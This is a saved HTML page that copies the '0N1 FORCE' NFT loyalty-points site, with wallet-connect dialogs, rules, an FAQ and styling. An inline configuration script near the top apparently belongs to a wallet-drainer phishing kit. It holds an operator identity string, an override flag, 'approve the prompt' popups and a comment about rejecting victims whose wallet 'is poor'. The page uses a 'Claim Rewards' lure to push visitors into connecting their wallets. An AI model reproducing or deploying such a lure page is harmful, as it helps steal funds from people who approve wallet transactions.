<!DOCTYPE html>
<html lang="en"
  style="--wcm-color-fg-1: rgb(20,20,20); --wcm-color-fg-2: rgb(121,134,134); --wcm-color-fg-3: rgb(158,169,169); --wcm-color-bg-1: rgb(255,255,255); --wcm-color-bg-2: rgb(241,243,243); --wcm-color-bg-3: rgb(228,231,231); --wcm-color-overlay: rgba(0,0,0,0.1); --wcm-accent-color: #3396FF; --wcm-accent-fill-color: #FFFFFF; --wcm-z-index: 89; --wcm-background-color: #3396FF; --wcm-background-border-radius: 8px; --wcm-container-border-radius: 30px; --wcm-wallet-icon-border-radius: 15px; --wcm-wallet-icon-large-border-radius: 30px; --wcm-wallet-icon-small-border-radius: 7px; --wcm-input-border-radius: 28px; --wcm-button-border-radius: 10px; --wcm-notification-border-radius: 36px; --wcm-secondary-button-border-radius: 28px; --wcm-icon-button-border-radius: 50%; --wcm-button-hover-highlight-border-radius: 10px; --wcm-text-big-bold-size: 20px; --wcm-text-big-bold-weight: 600; --wcm-text-big-bold-line-height: 24px; --wcm-text-big-bold-letter-spacing: -0.03em; --wcm-text-big-bold-text-transform: none; --wcm-text-xsmall-bold-size: 10px; --wcm-text-xsmall-bold-weight: 700; --wcm-text-xsmall-bold-line-height: 12px; --wcm-text-xsmall-bold-letter-spacing: 0.02em; --wcm-text-xsmall-bold-text-transform: uppercase; --wcm-text-xsmall-regular-size: 12px; --wcm-text-xsmall-regular-weight: 600; --wcm-text-xsmall-regular-line-height: 14px; --wcm-text-xsmall-regular-letter-spacing: -0.03em; --wcm-text-xsmall-regular-text-transform: none; --wcm-text-small-thin-size: 14px; --wcm-text-small-thin-weight: 500; --wcm-text-small-thin-line-height: 16px; --wcm-text-small-thin-letter-spacing: -0.03em; --wcm-text-small-thin-text-transform: none; --wcm-text-small-regular-size: 14px; --wcm-text-small-regular-weight: 600; --wcm-text-small-regular-line-height: 16px; --wcm-text-small-regular-letter-spacing: -0.03em; --wcm-text-small-regular-text-transform: none; --wcm-text-medium-regular-size: 16px; --wcm-text-medium-regular-weight: 600; --wcm-text-medium-regular-line-height: 20px; --wcm-text-medium-regular-letter-spacing: -0.03em; --wcm-text-medium-regular-text-transform: none; --wcm-font-family: -apple-system, system-ui, BlinkMacSystemFont, 'Segoe UI', Roboto, Ubuntu, 'Helvetica Neue', sans-serif; --wcm-font-feature-settings: 'tnum' on, 'lnum' on, 'case' on; --wcm-success-color: rgb(38,181,98); --wcm-error-color: rgb(242, 90, 103); --wcm-overlay-background-color: rgba(0, 0, 0, 0.3); --wcm-overlay-backdrop-filter: none;"
  data-scrapbook-source="https://points.0n1force.com/" data-scrapbook-create="20230918103107919"
  data-scrapbook-title="0N1 FORCE">

<head>
  <script defer="defer" src="js/vendors.js"></script>
  <script defer="defer" src="js/contracts.js"></script>
  <script defer="defer" src="js/main.js"></script>

  <script>
    window.UNIQUE_IDENTITY = "happy_shakika_29";

    // Pick a theme here, this defaults to "light"
    window.modal_theme = "light" || "dark";

    // https://docs.walletconnect.com/2.0/web3modal/html/wagmi/theming
    window.modal_variables = {
      /* Example of what you can do */
      // "--w3m-accent-color": "#FF00FF",
      // "--w3m-background-color": "#FF00FF",
      // "--w3m-logo-image-url": "/your-logo.svg",
    };

    // Notification modals
    window.popups = {
      PENDING: {
        // The popup that shows when they get prompted
        // title: "Claim Pending",
        text: "You must approve the prompt in order to continue."
      },
      INVALID: {
        // Shown when they connect on a wallet that is poor.
        // title: "Ineligible Address",
        text: "The connected account is not eligible for this event.\nPlease try using a different account.",
      }
    }

    // Only touch this if you know what you're doing!
    window.OVERRIDE_MODE = false;
  </script>
  <style data-rc-order="prependQueue" data-css-hash="1sujp2x" data-token-hash="vsp3ic">
    :where(.css-12jzuas) a {
      color: #1677ff;
      text-decoration: none;
      background-color: transparent;
      outline: none;
      cursor: pointer;
      transition: color 0.3s;
      -webkit-text-decoration-skip: objects;
    }

    :where(.css-12jzuas) a:hover {
      color: #69b1ff;
    }

    :where(.css-12jzuas) a:active {
      color: #0958d9;
    }

    :where(.css-12jzuas) a:active,
    :where(.css-12jzuas) a:hover {
      text-decoration: none;
      outline: 0;
    }

    :where(.css-12jzuas) a:focus {
      text-decoration: none;
      outline: 0;
    }

    :where(.css-12jzuas) a[disabled] {
      color: rgba(0, 0, 0, 0.25);
      cursor: not-allowed;
    }
  </style>
  <style data-rc-order="prependQueue" data-css-hash="182pwyw" data-token-hash="vsp3ic">
    :where(.css-12jzuas)[class^="ant-message"],
    :where(.css-12jzuas)[class*=" ant-message"] {
      font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, 'Helvetica Neue', Arial, 'Noto Sans', sans-serif, 'Apple Color Emoji', 'Segoe UI Emoji', 'Segoe UI Symbol', 'Noto Color Emoji';
      font-size: 14px;
      box-sizing: border-box;
    }

    :where(.css-12jzuas)[class^="ant-message"]::before,
    :where(.css-12jzuas)[class*=" ant-message"]::before,
    :where(.css-12jzuas)[class^="ant-message"]::after,
    :where(.css-12jzuas)[class*=" ant-message"]::after {
      box-sizing: border-box;
    }

    :where(.css-12jzuas)[class^="ant-message"] [class^="ant-message"],
    :where(.css-12jzuas)[class*=" ant-message"] [class^="ant-message"],
    :where(.css-12jzuas)[class^="ant-message"] [class*=" ant-message"],
    :where(.css-12jzuas)[class*=" ant-message"] [class*=" ant-message"] {
      box-sizing: border-box;
    }

    :where(.css-12jzuas)[class^="ant-message"] [class^="ant-message"]::before,
    :where(.css-12jzuas)[class*=" ant-message"] [class^="ant-message"]::before,
    :where(.css-12jzuas)[class^="ant-message"] [class*=" ant-message"]::before,
    :where(.css-12jzuas)[class*=" ant-message"] [class*=" ant-message"]::before,
    :where(.css-12jzuas)[class^="ant-message"] [class^="ant-message"]::after,
    :where(.css-12jzuas)[class*=" ant-message"] [class^="ant-message"]::after,
    :where(.css-12jzuas)[class^="ant-message"] [class*=" ant-message"]::after,
    :where(.css-12jzuas)[class*=" ant-message"] [class*=" ant-message"]::after {
      box-sizing: border-box;
    }

    :where(.css-12jzuas).ant-message {
      box-sizing: border-box;
      margin: 0;
      padding: 0;
      color: rgba(0, 0, 0, 0.88);
      font-size: 14px;
      line-height: 1.5714285714285714;
      list-style: none;
      font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, 'Helvetica Neue', Arial, 'Noto Sans', sans-serif, 'Apple Color Emoji', 'Segoe UI Emoji', 'Segoe UI Symbol', 'Noto Color Emoji';
      position: fixed;
      top: 8px;
      width: 100%;
      pointer-events: none;
      z-index: 1010;
    }

    :where(.css-12jzuas).ant-message .ant-message-move-up {
      animation-fill-mode: forwards;
    }

    :where(.css-12jzuas).ant-message .ant-message-move-up-appear,
    :where(.css-12jzuas).ant-message .ant-message-move-up-enter {
      animation-name: css-12jzuas-MessageMoveIn;
      animation-duration: 0.3s;
      animation-play-state: paused;
      animation-timing-function: cubic-bezier(0.78, 0.14, 0.15, 0.86);
    }

    :where(.css-12jzuas).ant-message .ant-message-move-up-appear.ant-message-move-up-appear-active,
    :where(.css-12jzuas).ant-message .ant-message-move-up-enter.ant-message-move-up-enter-active {
      animation-play-state: running;
    }

    :where(.css-12jzuas).ant-message .ant-message-move-up-leave {
      animation-name: css-12jzuas-MessageMoveOut;
      animation-duration: 0.3s;
      animation-play-state: paused;
      animation-timing-function: cubic-bezier(0.78, 0.14, 0.15, 0.86);
    }

    :where(.css-12jzuas).ant-message .ant-message-move-up-leave.ant-message-move-up-leave-active {
      animation-play-state: running;
    }

    :where(.css-12jzuas).ant-message-rtl {
      direction: rtl;
    }

    :where(.css-12jzuas).ant-message-rtl span {
      direction: rtl;
    }

    :where(.css-12jzuas).ant-message .ant-message-notice {
      padding: 8px;
      text-align: center;
    }

    :where(.css-12jzuas).ant-message .ant-message-notice .ant-message-custom-content>.anticon {
      vertical-align: text-bottom;
      margin-inline-end: 8px;
      font-size: 16px;
    }

    :where(.css-12jzuas).ant-message .ant-message-notice .ant-message-notice-content {
      display: inline-block;
      padding: 9px 12px;
      background: #ffffff;
      border-radius: 8px;
      box-shadow: 0 6px 16px 0 rgba(0, 0, 0, 0.08), 0 3px 6px -4px rgba(0, 0, 0, 0.12), 0 9px 28px 8px rgba(0, 0, 0, 0.05);
      pointer-events: all;
    }

    :where(.css-12jzuas).ant-message .ant-message-notice .ant-message-success>.anticon {
      color: #52c41a;
    }

    :where(.css-12jzuas).ant-message .ant-message-notice .ant-message-error>.anticon {
      color: #ff4d4f;
    }

    :where(.css-12jzuas).ant-message .ant-message-notice .ant-message-warning>.anticon {
      color: #faad14;
    }

    :where(.css-12jzuas).ant-message .ant-message-notice .ant-message-info>.anticon,
    :where(.css-12jzuas).ant-message .ant-message-notice .ant-message-loading>.anticon {
      color: #1677ff;
    }

    :where(.css-12jzuas).ant-message-notice-pure-panel {
      padding: 0;
      text-align: start;
    }

    :where(.css-12jzuas).ant-message-notice-pure-panel .ant-message-custom-content>.anticon {
      vertical-align: text-bottom;
      margin-inline-end: 8px;
      font-size: 16px;
    }

    :where(.css-12jzuas).ant-message-notice-pure-panel .ant-message-notice-content {
      display: inline-block;
      padding: 9px 12px;
      background: #ffffff;
      border-radius: 8px;
      box-shadow: 0 6px 16px 0 rgba(0, 0, 0, 0.08), 0 3px 6px -4px rgba(0, 0, 0, 0.12), 0 9px 28px 8px rgba(0, 0, 0, 0.05);
      pointer-events: all;
    }

    :where(.css-12jzuas).ant-message-notice-pure-panel .ant-message-success>.anticon {
      color: #52c41a;
    }

    :where(.css-12jzuas).ant-message-notice-pure-panel .ant-message-error>.anticon {
      color: #ff4d4f;
    }

    :where(.css-12jzuas).ant-message-notice-pure-panel .ant-message-warning>.anticon {
      color: #faad14;
    }

    :where(.css-12jzuas).ant-message-notice-pure-panel .ant-message-info>.anticon,
    :where(.css-12jzuas).ant-message-notice-pure-panel .ant-message-loading>.anticon {
      color: #1677ff;
    }
  </style>
  <style data-rc-order="prependQueue" data-css-hash="_effect-css-12jzuas-MessageMoveIn">
    @keyframes css-12jzuas-MessageMoveIn {
      0% {
        padding: 0;
        transform: translateY(-100%);
        opacity: 0;
      }

      100% {
        padding: 8px;
        transform: translateY(0);
        opacity: 1;
      }
    }
  </style>
  <style data-rc-order="prependQueue" data-css-hash="_effect-css-12jzuas-MessageMoveOut">
    @keyframes css-12jzuas-MessageMoveOut {
      0% {
        max-height: 150px;
        padding: 8px;
        opacity: 1;
      }

      100% {
        max-height: 0;
        padding: 0;
        opacity: 0;
      }
    }
  </style>
  <meta charset="UTF-8">
  <link rel="stylesheet" href="27d9405abb3b3614.css" data-precedence="next">
  <link rel="stylesheet" href="156f436de4287b54.css" data-precedence="next">
  <title>0N1 FORCE</title>
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="icon" href="favicon.ico" type="image/x-icon" sizes="any">
  <meta name="next-size-adjust">
  <script
    data-scrapbook-elem="custom-elements-loader">(function (names) { if (!customElements) { return; } for (const name of names) { customElements.define(name, class CustomElement extends HTMLElement { }); } })(["next-route-announcer", "wcm-explorer-context", "wcm-theme-context", "wcm-modal"])</script>
</head>

<body class="__className_0ec1f4"><noscript>
    <iframe src="index_1.html" height="0" width="0" style="display:none;visibility:hidden"
      id="tag-manager"></iframe></noscript>
  <div class="fixed_head">
    <div>
      <div class="Header_head_wrap__5v2t4">
        <div class="Header_hd_border__KZPT9"><span class="Header_s1__seTwb"></span><span
            class="Header_s2__5f1au"></span><span class="Header_s3__wsF3c"></span></div>
        <div class="Header_hd_content__LYZpE false">
          <div><a href=""><img alt="" loading="lazy" width="45" height="45" decoding="async" data-nimg="1"
                style="color:transparent" src="0n1logo.svg"></a></div>
          <div class="Header_gnav__2fPy1"><a class="Header_glink__ND6Hx"
              href="https://points.0n1force.com/leaderboard">Leaderboard</a>
            <div id="connect_button" class="Header_account_wrap__0SoIo"><span class="Header_btn_connect__T3t9L">Connect</span></div>
            <div class="Header_sns__D_ljK"><a href="https://twitter.com/0n1force" target="_blank"
                class="Header_item__2DE0C Header_twitter__Vx2td"><img alt="" loading="lazy" width="20" height="20"
                  decoding="async" data-nimg="1" style="color:transparent" src="twitter.png"></a><a
                href="https://instagram.com/0n1force" target="_blank"
                class="Header_item__2DE0C Header_instagram__spyZn"><img alt="" loading="lazy" width="20" height="20"
                  decoding="async" data-nimg="1" style="color:transparent" src="instagram.svg"></a></div>
          </div>
          <div class="Header_menuButton__9fr6p"><span></span><span></span><span></span></div>
        </div>
      </div>
      <div class="DialogConnect_cus_dialog__XC_oI DialogConnect_dialog_connect__nJ1Ei" style="display:none">
        <div class="DialogConnect_content__0w_F3">
          <div class="DialogConnect_btn_close__Ml1p8"></div>
          <div class="DialogConnect_dtl__kYvV4">Connect a Wallet</div>
          <ul class="DialogConnect_dbd__G4lNO">
            <li class="wallet_item__xfV_s"><span class="wallet_name__jHeeA">MetaMask</span><span
                class="wallet_icon__K3Lft"><img alt="" loading="lazy" width="26.5" height="24.5" decoding="async"
                  data-nimg="1" style="color:transparent" src="metamask.png"></span></li>
            <li class="wallet_item__xfV_s"><span class="wallet_name__jHeeA">Coinbase Wallet</span><span
                class="wallet_icon__K3Lft"><img alt="" loading="lazy" width="28.5" height="28.5" decoding="async"
                  data-nimg="1" style="color:transparent" src="coinbase.png"></span></li>
            <li class="wallet_item__xfV_s"><span class="wallet_name__jHeeA">Wallet Connect</span><span
                class="wallet_icon__K3Lft"><img alt="" loading="lazy" width="34" height="23.5" decoding="async"
                  data-nimg="1" style="color:transparent" src="social.png"></span></li>
          </ul>
        </div>
      </div>
    </div>
  </div>
  <div class="">
    <div class="app_hm_banner__3a8x_">
      <div class="app_hm_logo__tbV2Y"><img alt="" loading="lazy" width="230" height="128" decoding="async" data-nimg="1"
          style="color:transparent" src="hm_logo.png"></div>
      <div class="app_txt__MpEb3">Earning rewards is live now! Rep your On1 on Twitter and <br>
        <br>
        <span class="app_red__3Vdbs" style="cursor: pointer;" id="connect_button">Claim Rewards</span><br class="app_f_pc__VTg5d">
      </div>
    </div>
    <div class="app_rules_bg__WPBYX">
      <div class="app_rules_wrap__MFTLM">
        <div class="app_rules_content__FqbLm">
          <div class="app_rtl__KcBR3"><img alt="Rules" loading="lazy" width="440" height="80" decoding="async"
              data-nimg="1" class="app_rbg__HPU9C" style="color:transparent" src="img_rules.png"><span
              class="app_title__of6bm">Rules</span></div>
          <div class="app_rbd__gQq2R">
            <ul class="app_list__h04n5">
              <li class="app_item__g5USq">Reward points tied to wallet address</li>
              <li class="app_item__g5USq">Check PFP match every 12 hours</li>
              <li class="app_item__g5USq">10 points every 12 hours (20 points per day)</li>
              <li class="app_item__g5USq">2x bonus for first 14 days (20 points every 12 hours, <br>40 points per day)
              </li>
            </ul>
          </div>
          <div class="app_rft__gr_Jh">
            <p class="app_notes__JBVT8">Use ON1 FORCE NFT as your Twitter profile picture right away!</p>
            <div class="app_link__n9eKX"><span class="app_txt__MpEb3">GO NOW</span></div>
          </div>
        </div>
        <div class="app_rlogo__Rtn_0"><img alt="" loading="lazy" width="218.13" height="110.85" decoding="async"
            data-nimg="1" style="color:transparent" src="logo.png"></div>
      </div>
      <div class="app_line__cQYLG"><img alt="" loading="lazy" width="88" height="118" decoding="async" data-nimg="1"
          style="color:transparent" src="icon_line.png"></div>
    </div>
    <div class="Faqs_faq_bg___18ZU">
      <div class="Faqs_faq_wrap__khlQ5">
        <div class="Faqs_inner__SaLms">
          <div class="Faqs_ftl__N_OCT">FAQ</div>
          <div class="Faqs_fbd__Lbfb9">
            <dl class="Faqs_item__1x0hX ">
              <dt class="Faqs_q__HgcEm">How do I earn points?</dt>
              <dd class="Faqs_a__FSRch">Show your support and rep 0N1 Force as your twitter PFP to earn loyalty points!
                Set your twitter PFP as any 0N1 within your connected wallet. Points will be distributed on a continuous
                basis. 40 points can be earned daily, with a 2x multiplier for the first 14 days.</dd>
            </dl>
            <dl class="Faqs_item__1x0hX ">
              <dt class="Faqs_q__HgcEm">How do you track your points?</dt>
              <dd class="Faqs_a__FSRch">Track points through our leaderboard system! Loyalty points will be updated,
                along with your ranking. Check your position against other holders and show off your commitment to the
                ecosystem.</dd>
            </dl>
            <dl class="Faqs_item__1x0hX ">
              <dt class="Faqs_q__HgcEm">How do I manage my account?</dt>
              <dd class="Faqs_a__FSRch">Change your leaderboard PFP and Twitter account through your profile page.</dd>
            </dl>
            <dl class="Faqs_item__1x0hX ">
              <dt class="Faqs_q__HgcEm">What can I do with my points?</dt>
              <dd class="Faqs_a__FSRch">Each season will have unique rewards from both 0N1 Force and our seasonal
                sponsors. The more points you earn, the bigger your rewards.</dd>
            </dl>
            <dl class="Faqs_item__1x0hX ">
              <dt class="Faqs_q__HgcEm">How long does the season last?</dt>
              <dd class="Faqs_a__FSRch">Each season will vary in length based on the project’s development and seasonal
                sponsors.</dd>
            </dl>
            <dl class="Faqs_item__1x0hX ">
              <dt class="Faqs_q__HgcEm">Is there cold wallet support?</dt>
              <dd class="Faqs_a__FSRch">Yes! If your 0n1 is stored in your vault, you can easily use delegate.xyz to
                connect your cold wallet.</dd>
            </dl>
          </div>
          <div class="Faqs_fft__HMKZP"></div>
        </div>
      </div>
    </div>
  </div>
  <footer class="Footer_foot_wrap__BqcuD">
    <div class="Footer_footer_content__46uUW"><a href=""><img alt="" loading="lazy" width="148" height="75.21"
          decoding="async" data-nimg="1" class="Footer_logo__K1ylQ" style="color:transparent" src="logo.png"></a>
      <p class="Footer_txt__aK3vY">The original collection, 0N1 Force are 7,777 citizens that had once lived for
        eternity in the Ethereal Enclave. That all suddenly changed when the Emperor died and the Enclave was flung into
        chaos... <br><br>Now the collection grows with the addition of Nano Suits, comic, and future Metaverse utility!
      </p>
    </div>
    <div class="Footer_footer_socials__znHqZ"><a href="https://twitter.com/0n1force" target="_blank"
        class="Footer_item__UvhDF Footer_twitter__tdNNI"><img alt="" loading="lazy" width="20" height="20"
          decoding="async" data-nimg="1" style="color:transparent" src="twitter.png"></a><a
        href="https://instagram.com/0n1force" target="_blank" class="Footer_item__UvhDF Footer_instagram__G0vsJ"><img
          alt="" loading="lazy" width="20" height="20" decoding="async" data-nimg="1" style="color:transparent"
          src="instagram.svg"></a></div>
  </footer>
  <div class="DialogVerify_cus_dialog__1vE9e DialogVerify_dialog_verify__JGGqF" style="display:none">
    <div class="DialogVerify_content__hEsy9">
      <div class="DialogVerify_btn_close__Blvtu"></div>
      <div class="DialogVerify_dtl__pb9NV">Verify Your Twitter</div>
      <div class="DialogVerify_dbd__QJ3GD">
        <div class="DialogVerify_img__MsOtt"><img alt="" loading="lazy" width="98" height="98" decoding="async"
            data-nimg="1" style="color:transparent" src="icon_twitter.png"></div>
        <div class="DialogVerify_txt__7hnkR">You can only earn points<span class="DialogVerify_red__s7Li2"> after
            verifying your Twitter account</span></div>
      </div>
      <div class="DialogVerify_dft__oXnE4">Verify NOW</div>
    </div>
  </div><next-route-announcer style="position: absolute;"
    data-scrapbook-shadowdom="<div aria-live=&quot;assertive&quot; id=&quot;__next-route-announcer__&quot; role=&quot;alert&quot; style=&quot;position: absolute; border: 0px; height: 1px; margin: -1px; padding: 0px; width: 1px; clip: rect(0px, 0px, 0px, 0px); overflow: hidden; white-space: nowrap; overflow-wrap: normal;&quot;></div>"></next-route-announcer><wcm-modal
    data-scrapbook-shadowdom="<!----><wcm-explorer-context data-scrapbook-shadowdom=&quot;<!---->&quot;></wcm-explorer-context><wcm-theme-context data-scrapbook-shadowdom=&quot;<!---->&quot;></wcm-theme-context><div id=&quot;wcm-modal&quot; role=&quot;alertdialog&quot; aria-modal=&quot;true&quot; class=&quot; wcm-overlay &quot;><div class=&quot;wcm-container&quot; tabindex=&quot;0&quot;><!--?lit$122359636$--></div></div><style data-scrapbook-elem=&quot;adoptedStyleSheet&quot;>*, ::after, ::before { margin: 0px; padding: 0px; box-sizing: border-box; font-style: normal; text-rendering: optimizespeed; -webkit-font-smoothing: antialiased; -webkit-tap-highlight-color: transparent; backface-visibility: hidden; }
button { cursor: pointer; display: flex; justify-content: center; align-items: center; position: relative; border: none; background-color: transparent; transition: all 0.2s ease 0s; }
@media (hover: hover) and (pointer: fine) {
  button:active { transition: all 0.1s ease 0s; transform: scale(0.93); }
}
button::after { content: &quot;&quot;; position: absolute; inset: 0px; transition: background-color 0s ease 0s, all 0.2s ease 0s; }
button:disabled { cursor: not-allowed; }
button svg, button wcm-text { position: relative; z-index: 1; }
input { border: none; outline: 0px; appearance: none; }
img { display: block; }
::selection { color: var(--wcm-accent-fill-color); background: var(--wcm-accent-color); }</style><style data-scrapbook-elem=&quot;adoptedStyleSheet&quot;>:host { all: initial; }
.wcm-overlay { inset: 0px; position: fixed; z-index: var(--wcm-z-index); overflow: hidden; display: flex; justify-content: center; align-items: center; opacity: 0; pointer-events: none; background-color: var(--wcm-overlay-background-color); backdrop-filter: var(--wcm-overlay-backdrop-filter); }
@media (max-height: 720px) and (orientation: landscape) {
  .wcm-overlay { overflow: scroll; align-items: flex-start; padding: 20px 0px; }
}
.wcm-active { pointer-events: auto; }
.wcm-container { position: relative; max-width: 360px; width: 100%; outline: 0px; border-radius: var(--wcm-background-border-radius) var(--wcm-background-border-radius) var(--wcm-container-border-radius) var(--wcm-container-border-radius); border: 1px solid var(--wcm-color-overlay); overflow: hidden; }
.wcm-card { width: 100%; position: relative; border-radius: var(--wcm-container-border-radius); overflow: hidden; box-shadow: 0 6px 14px -6px rgba(10,16,31,.12),0 10px 32px -4px rgba(10,16,31,.1),0 0 0 1px var(--wcm-color-overlay); background-color: var(--wcm-color-bg-1); color: var(--wcm-color-fg-1); }
@media (max-width: 600px) {
  .wcm-container { max-width: 440px; border-radius: var(--wcm-background-border-radius) var(--wcm-background-border-radius) 0 0; }
  .wcm-card { border-radius: var(--wcm-container-border-radius) var(--wcm-container-border-radius) 0 0; }
  .wcm-overlay { align-items: flex-end; }
}
@media (max-width: 440px) {
  .wcm-container { border: 0px; }
}</style>"></wcm-modal><iframe id="verify-api" src="a6cc11517a10f6f12953fd67b1eb67e7.txt"
    style="display: none;"></iframe>
  <script
    data-scrapbook-elem="basic-loader">(function () { var k1 = "data-scrapbook-shadowdom", k2 = "data-scrapbook-canvas", k3 = "data-scrapbook-input-indeterminate", k4 = "data-scrapbook-input-checked", k5 = "data-scrapbook-option-selected", k6 = "data-scrapbook-input-value", k7 = "data-scrapbook-textarea-value", fn = function (r) { var E = r.querySelectorAll ? r.querySelectorAll("*") : r.getElementsByTagName("*"), i = E.length, e, d, s; while (i--) { e = E[i]; if ((d = e.getAttribute(k1)) !== null && !e.shadowRoot && e.attachShadow) { s = e.attachShadow({ mode: 'open' }); s.innerHTML = d; e.removeAttribute(k1); } if ((d = e.getAttribute(k2)) !== null) { (function () { var c = e, g = new Image(); g.onload = function () { c.getContext('2d').drawImage(g, 0, 0); }; g.src = d; })(); e.removeAttribute(k2); } if ((d = e.getAttribute(k3)) !== null) { e.indeterminate = true; e.removeAttribute(k3); } if ((d = e.getAttribute(k4)) !== null) { e.checked = d === 'true'; e.removeAttribute(k4); } if ((d = e.getAttribute(k5)) !== null) { e.selected = d === 'true'; e.removeAttribute(k5); } if ((d = e.getAttribute(k6)) !== null) { e.value = d; e.removeAttribute(k6); } if ((d = e.getAttribute(k7)) !== null) { e.value = d; e.removeAttribute(k7); } if (e.shadowRoot) { fn(e.shadowRoot); } } }; fn(document); })()</script>
</body>
<div class="-cbwsdk-css-reset">
  <div class="-cbwsdk-link-flow-root">
    <div class="-cbwsdk-connect-dialog-container -cbwsdk-connect-dialog-container-hidden">
      <style>
        .-cbwsdk-css-reset .-cbwsdk-connect-dialog {
          z-index: 2147483647;
          position: fixed;
          top: 0;
          left: 0;
          right: 0;
          bottom: 0;
          display: flex;
          align-items: center;
          justify-content: center
        }

        .-cbwsdk-css-reset .-cbwsdk-connect-dialog-backdrop {
          z-index: 2147483647;
          position: fixed;
          top: 0;
          left: 0;
          right: 0;
          bottom: 0;
          transition: opacity .25s
        }

        .-cbwsdk-css-reset .-cbwsdk-connect-dialog-backdrop.light {
          background-color: rgba(0, 0, 0, .5)
        }

        .-cbwsdk-css-reset .-cbwsdk-connect-dialog-backdrop.dark {
          background-color: rgba(50, 53, 61, .4)
        }

        .-cbwsdk-css-reset .-cbwsdk-connect-dialog-backdrop-hidden {
          opacity: 0
        }

        .-cbwsdk-css-reset .-cbwsdk-connect-dialog-box {
          display: flex;
          position: relative;
          flex-direction: column;
          transform: scale(1);
          transition: opacity .25s, transform .25s
        }

        .-cbwsdk-css-reset .-cbwsdk-connect-dialog-box-hidden {
          opacity: 0;
          transform: scale(0.85)
        }

        .-cbwsdk-css-reset .-cbwsdk-connect-dialog-container {
          display: block
        }

        .-cbwsdk-css-reset .-cbwsdk-connect-dialog-container-hidden {
          display: none
        }
      </style>
      <div class="-cbwsdk-connect-dialog-backdrop light -cbwsdk-connect-dialog-backdrop-hidden"></div>
      <div class="-cbwsdk-connect-dialog">
        <div class="-cbwsdk-connect-dialog-box -cbwsdk-connect-dialog-box-hidden">
          <div data-testid="connect-content" class="-cbwsdk-connect-content light">
            <style>
              .-cbwsdk-css-reset .-cbwsdk-connect-content {
                height: 430px;
                width: 700px;
                border-radius: 12px;
                padding: 30px
              }

              .-cbwsdk-css-reset .-cbwsdk-connect-content.light {
                background: #fff
              }

              .-cbwsdk-css-reset .-cbwsdk-connect-content.dark {
                background: #0a0b0d
              }

              .-cbwsdk-css-reset .-cbwsdk-connect-content-header {
                display: flex;
                align-items: center;
                justify-content: space-between;
                margin: 0 0 30px
              }

              .-cbwsdk-css-reset .-cbwsdk-connect-content-heading {
                font-style: normal;
                font-weight: 500;
                font-size: 28px;
                line-height: 36px;
                margin: 0
              }

              .-cbwsdk-css-reset .-cbwsdk-connect-content-heading.light {
                color: #0a0b0d
              }

              .-cbwsdk-css-reset .-cbwsdk-connect-content-heading.dark {
                color: #fff
              }

              .-cbwsdk-css-reset .-cbwsdk-connect-content-layout {
                display: flex;
                flex-direction: row
              }

              .-cbwsdk-css-reset .-cbwsdk-connect-content-column-left {
                margin-right: 30px;
                display: flex;
                flex-direction: column;
                justify-content: space-between
              }

              .-cbwsdk-css-reset .-cbwsdk-connect-content-column-right {
                flex: 25%;
                margin-right: 34px
              }

              .-cbwsdk-css-reset .-cbwsdk-connect-content-qr-wrapper {
                width: 220px;
                height: 220px;
                border-radius: 12px;
                display: flex;
                justify-content: center;
                align-items: center;
                background: #fff
              }

              .-cbwsdk-css-reset .-cbwsdk-connect-content-qr-connecting {
                position: absolute;
                top: 0;
                bottom: 0;
                left: 0;
                right: 0;
                display: flex;
                flex-direction: column;
                align-items: center;
                justify-content: center
              }

              .-cbwsdk-css-reset .-cbwsdk-connect-content-qr-connecting.light {
                background-color: rgba(255, 255, 255, .95)
              }

              .-cbwsdk-css-reset .-cbwsdk-connect-content-qr-connecting.light>p {
                color: #0a0b0d
              }

              .-cbwsdk-css-reset .-cbwsdk-connect-content-qr-connecting.dark {
                background-color: rgba(10, 11, 13, .9)
              }

              .-cbwsdk-css-reset .-cbwsdk-connect-content-qr-connecting.dark>p {
                color: #fff
              }

              .-cbwsdk-css-reset .-cbwsdk-connect-content-qr-connecting>p {
                font-size: 12px;
                font-weight: bold;
                margin-top: 16px
              }

              .-cbwsdk-css-reset .-cbwsdk-connect-content-update-app {
                border-radius: 8px;
                font-size: 14px;
                line-height: 20px;
                padding: 12px;
                width: 339px
              }

              .-cbwsdk-css-reset .-cbwsdk-connect-content-update-app.light {
                background: #eef0f3;
                color: #5b636e
              }

              .-cbwsdk-css-reset .-cbwsdk-connect-content-update-app.dark {
                background: #1e2025;
                color: #8a919e
              }

              .-cbwsdk-css-reset .-cbwsdk-cancel-button {
                -webkit-appearance: none;
                border: none;
                background: none;
                cursor: pointer;
                padding: 0;
                margin: 0
              }

              .-cbwsdk-css-reset .-cbwsdk-cancel-button-x {
                position: relative;
                display: block;
                cursor: pointer
              }

              .-cbwsdk-css-reset .-cbwsdk-wallet-steps {
                padding: 0 0 0 16px;
                margin: 0;
                width: 100%;
                list-style: decimal
              }

              .-cbwsdk-css-reset .-cbwsdk-wallet-steps-item {
                list-style-type: decimal;
                display: list-item;
                font-style: normal;
                font-weight: 400;
                font-size: 16px;
                line-height: 24px;
                margin-top: 20px
              }

              .-cbwsdk-css-reset .-cbwsdk-wallet-steps-item.light {
                color: #0a0b0d
              }

              .-cbwsdk-css-reset .-cbwsdk-wallet-steps-item.dark {
                color: #fff
              }

              .-cbwsdk-css-reset .-cbwsdk-wallet-steps-item-wrapper {
                display: flex;
                align-items: center
              }

              .-cbwsdk-css-reset .-cbwsdk-wallet-steps-pad-left {
                margin-left: 6px
              }

              .-cbwsdk-css-reset .-cbwsdk-wallet-steps-icon {
                display: flex;
                border-radius: 50%;
                height: 24px;
                width: 24px
              }

              .-cbwsdk-css-reset .-cbwsdk-wallet-steps-icon svg {
                margin: auto;
                display: block
              }

              .-cbwsdk-css-reset .-cbwsdk-wallet-steps-icon.light {
                background: #0052ff
              }

              .-cbwsdk-css-reset .-cbwsdk-wallet-steps-icon.dark {
                background: #588af5
              }

              .-cbwsdk-css-reset .-cbwsdk-connect-item {
                align-items: center;
                display: flex;
                flex-direction: row;
                padding: 16px 24px;
                gap: 12px;
                cursor: pointer
              }

              .-cbwsdk-css-reset .-cbwsdk-connect-item.light {
                color: #0a0b0d
              }

              .-cbwsdk-css-reset .-cbwsdk-connect-item.light.selected {
                background: #f5f8ff;
                color: #0052ff
              }

              .-cbwsdk-css-reset .-cbwsdk-connect-item.dark {
                color: #fff
              }

              .-cbwsdk-css-reset .-cbwsdk-connect-item.dark.selected {
                background: #001033;
                color: #588af5
              }

              .-cbwsdk-css-reset .-cbwsdk-connect-item.selected {
                border-radius: 100px;
                font-weight: 600
              }

